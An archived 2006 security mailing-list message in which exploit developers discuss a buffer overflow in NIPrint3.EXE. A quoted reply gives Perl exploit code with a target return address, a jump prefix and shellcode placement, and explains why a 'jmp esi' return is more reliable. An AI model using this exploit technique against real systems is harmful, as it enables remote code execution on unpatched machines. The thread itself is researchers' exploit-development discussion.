From: Bas Alberts (bas.albertsimmunitysec.com)
Date: Tue May 23 2006 - 19:40:43 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Thank god the VS demo buffer is also compatible with jmp esi targets..we
must've gotten that right by accident! :D:D

Thanks HD :D

Love,
Bas

On Tue, May 23, 2006 at 05:35:38PM -0500, H D Moore wrote:
> On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
> > Anyways, there's a movie here:
> > http://www.immunitysec.com/documentation/vs_niprint.html
>
> Not to nitpick, but there is a better way to exploit this bug:
>
> 'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ],
>
> my $req = Pex::Text::AlphaNumText(8192);
> substr($req, 0, 2, "\xeb\x33");
> substr($req, 49, 4, pack('V', $target->[1]));
> substr($req, 53, length($shellcode), $shellcode);
> $s->Send($req);
>
> This will return to a "jmp %esi", where %esi points to the source string
> before the memory overwrite. The benefits of this vs the "jmp %esp":
> * Our code isn't running so close to ESP (easy to fix w/prepend)
> * More room for the actual payload (could even embed the ret)
> * The return address will work regardless of OS/SP combo
>
> Fun stuff, keep up the demos :-)
>
> -HD

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFEc6uLLpdA2Ju9tfcRAoPCAKC6UWIbweGZtHy9YxfjTes+CtPQIgCeMz+d
6Ig+Wd8c4dHtoOBZRSwFkkQ=
=VJO3
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]